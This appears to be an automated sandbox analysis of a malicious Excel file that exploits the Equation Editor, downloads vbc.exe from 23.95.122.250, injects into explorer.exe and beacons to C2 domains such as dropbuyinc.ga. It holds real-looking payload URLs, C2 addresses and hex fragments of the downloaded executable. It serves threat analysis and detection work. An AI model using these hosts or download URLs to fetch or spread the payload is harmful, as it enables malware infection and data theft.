Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171

Source: global traffic	DNS query: name: dropbuyinc.ga
Source: global traffic	DNS query: name: dropbuyinc.ga
Source: global traffic	DNS query: name: dropbuyinc.ga
Source: global traffic	DNS query: name: dropbuyinc.ga
Source: global traffic	DNS query: name: dropbuyinc.ga
Source: global traffic	DNS query: name: dropbuyinc.ga

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe	Domain query: dropbuyinc.ga
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.230.13.96 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://dropbuyinc.ga/
Source: Malware configuration extractor	URLs: http://omacrestinc.ga/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 16 May 2023 10:56:33 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28Last-Modified: Mon, 15 May 2023 17:53:33 GMTETag: "f7978-5fbbf221a9fd1"Accept-Ranges: bytesContent-Length: 1014136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 71 62 64 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 70 05 00 00 00 0a 00 00 00 00 00 db 02 05 00 00 10 00 00 00 80 05 00 00 00 a3 0f 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 10 00 00 b7 ad 0f 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 6c 05 00 50 00 00 00 00 b0 05 00 48 c4 09 00 00 00 00 00 00 00 00 00 00 60 0f 00 78 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 63 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 80 24 00 00 00 80 05 00 00 10 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 c4 09 00 00 b0 05 00 00 d0 09 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /24/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.250Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gekbvbme.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: dropbuyinc.ga
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dropbuyinc.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1305Host: dropbuyinc.ga

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036803EA LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036803EA

Source: EQNEDT32.EXE, 00000002.00000002.973874573.0000000000564000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000002.1128105028.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.122.250/24/vbc.exe
Source: EQNEDT32.EXE, 00000010.00000002.1128105028.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.122.250/24/vbc.exeC:
Source: EQNEDT32.EXE, 00000010.00000002.1128105028.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.122.250/24/vbc.exeb
Source: EQNEDT32.EXE, 00000002.00000002.973874573.000000000056F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000002.1128105028.00000000005CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.122.250/24/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.122.250/24/vbc.exej
Source: EQNEDT32.EXE, 00000010.00000002.1128105028.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.122.250/24/vbc.exek
Source: explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: explorer.exe, 00000012.00000002.1151222846.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.1151222846.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.1151222846.000000000033A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.1151222846.0000000000330000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1129567646.000000000041E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1133426014.0000000000274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.1194849138.0000000000284000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.1194794458.00000000003EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1194906622.0000000000574000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1194578290.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.1194757561.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1194727829.000000000026E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dropbuyinc.ga/
Source: explorer.exe, 00000012.00000002.1151222846.00000000002F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dropbuyinc.ga/%
Source: explorer.exe, 00000009.00000002.1195305052.00000000003A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dropbuyinc.ga/(
Source: explorer.exe, 00000012.00000002.1151222846.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1129567646.000000000041E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1133426014.0000000000274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.1194849138.0000000000284000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.1194794458.00000000003EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1194906622.0000000000574000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1194578290.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.1194757561.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1194727829.000000000026E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dropbuyinc.ga/Mozilla/5.0
Source: explorer.exe, 00000012.00000002.1151222846.0000000000330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dropbuyinc.ga/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000009.00000002.1215094567.00000000084D2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://gekbvbme.com/
Source: explorer.exe, 00000009.00000002.1215094567.00000000084D2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://gekbvbme.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: explorer.exe, 00000009.00000000.996261138.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000009.00000000.1040644007.0000000006450000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.973874573.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: EQNEDT32.EXE, 00000002.00000002.975766238.0000000005200000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.973874573.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000009.00000000.996261138.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EQNEDT32.EXE, 00000002.00000002.973874573.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.972954865.0000000005201000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215833145.0000000008899000.00000004.00000001.00020000.00000000.sdmp, EQNEDT32.EXE, 00000010.00000003.1124912321.0000000004E69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.hyperionics.com0
Source: explorer.exe, 00000009.00000000.1011787841.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000009.00000002.1206641857.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000009.00000002.1214032258.0000000004DE8000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1039948841.0000000004DE8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000009.00000000.1054879390.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1198869803.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1055762169.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215268236.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1007179652.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000009.00000000.1055248156.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215268236.0000000008611000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000009.00000000.1055055001.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215161680.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1215745549.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1055762169.0000000008807000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000009.00000002.1198869803.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1007179652.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000009.00000002.1202387555.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1027064494.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000009.00000002.1200177278.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000012.00000003.1147507743.000000000033C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDCC6969.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: dropbuyinc.ga

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036803EA LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036803EA

Source: global traffic

HTTP traffic detected: GET /24/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.250Connection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 May 2023 10:57:42 GMTServer: Apache/2.4.56 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 63 65 37 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 2b 05 72 aa a5 4f 77 81 af 4e 3d 0f 21 04 3c 00 9f 17 ad a1 b5 c9 66 2e 64 c8 ec ad 2e 36 73 83 3c e7 57 dc 15 49 d9 6c 38 e7 37 a0 a3 60 a8 e4 f9 48 54 c3 c6 c2 c8 ce 27 fc 76 64 9b 6c fc 27 4d 8b 66 a0 0e 5c 9f 43 f5 b4 3b 67 b1 3d 28 a6 5f 5c fb e1 dc c6 46 cb a6 b4 4d 5f 1c ba 3b 6c a9 3f a5 bc 09 97 81 31 0b ca c1 a8 bb df f6 e0 65 8c 4e e1 b4 80 09 6b f6 1d 9f 87 8e 5f fb e7 76 3a d6 81 76 6a 2c f9 42 1b 7d fb fd 65 7d ee 7c fb 47 a8 b1 95 23 a7 1a 4d 5a a0 a3 2b 0e bf 0f 06 4f 85 94 f6 64 27 a8 ee 54 99 27 c4 f5 c3 9d 85 a7 62 f0 2e 91 c7 df b8 da a4 51 62 a7 49 ca 7e a1 37 41 c8 5a 56 82 66 2a 43 1f 8d 67 86 43 05 aa 0a 39 3c 6e 99 d0 1e 87 59 d7 e0 f0 eb 41 cb d1 12 70 dd d3 d1 b0 28 ee ee 48 ed 41 73 f1 17 05 33 83 f7 9c 6f e6 61 89 df cc 47 8d 9b 0b 69 c1 1f f9 6c 2b 22 1e e8 ea f8 7a bb 7f d7 b9 1a 26 18 2d d9 8a 5b d0 9c 91 c8 c8 be 4a 34 1c 18 72 1a 69 3d 1f fc 91 7c 90 7e 98 3f e8 66 e1 58 ad 21 39 12 7b b9 e6 d6 7d 48 2e d4 60 c4 8b 22 36 a1 ec d4 19 49 fa 7c 8a a4 29 5d ff 86 df af d7 4c e4 43 8e 68 8b e8 2e 1c fe 49 28 fb fb 0e da c2 82 ed b5 a1 4a 7d 5e 1b c3 0c 26 a4 3c b6 48 7a 4d ea 03 22 25 14 97 c9 ae 54 d2 3a 81 50 a5 ae f5 8f 5a 90 2d ea 0b 75 d2 eb 5d 00 3c 7d fe 4c 27 57 84 09 75 93 ab dd 9d e2 de 6e a0 9d a4 8e 79 9e 49 07 a4 8c b2 cc 18 1d b4 86 c8 6d 3c 77 0b 3c 4a d1 86 f9 37 17 43 89 46 2d e9 bf eb 8b 02 1c a0 a9 f0 f7 ce f7 5a f2 d8 a3 ce 7f 1a b5 32 99 af a4 9a 52 fd 29 b8 b9 76 83 14 ad cf 3a 42 ba 01 1a f6 f4 ce 8a 07 1b c0 b7 b8 19 6c 3a 53 90 4e ac 21 50 4e 0a 65 79 a4 a2 0b 68 d7 18 8f bc 84 88 72 fe 13 ff 41 9d 0c 8e a0 2b 61 47 99 59 04 c5 5b 01 c0 f4 6d d7 2e 41 6b 2f 16 d0 5f 95 f3 2f 11 df 33 6d cd f3 7c 21 d3 0a d9 3a 6b 5c 9a 1f e6 d0 11 8a c5 ee 0d 9b 63 b9 76 90 f7 ad e6 60 11 b2 8d b9 52 2e fa c6 79 76 9b ff 26 4b d4 8b 90 31 1c 75 7f 84 d6 6c 7f db 0e a5 95 8b a1 dd 22 31 7f a1 8c 8f 00 99 98 85 e4 ea a1 94 df 6a f3 e7 1c dc 7e 5d 9f f7 88 d3 f5 73 1a 84 d2 1d 16 8d a2 c2 d2 28 11 cc f1 7f e0 6b 93 26 3f 89 ca 56 15 34 dc 8e f4 f2 35 1f 4e 59 4e fc c1 3e ac 07 09 72 6a 40 de 41 39 46 9a eb 4f c8 d0 64 a2 f0 f7 65 9f 82 d0 5b 0b b9 e7 89 0d e0 c7 19 53 aa 1f 72 06 ed 6f 39 5a 2d cf 7e 9d 4a d1 de 7e f9 1e 97 9f d8 54 a0 41 9b 40 99 33 20 c9 39 f1 bc 20 1c f6 a0 fd c3 66 af 0e 79 17 f5 eb 8f b2 0b 44 ef 71 c3 59 d9 61 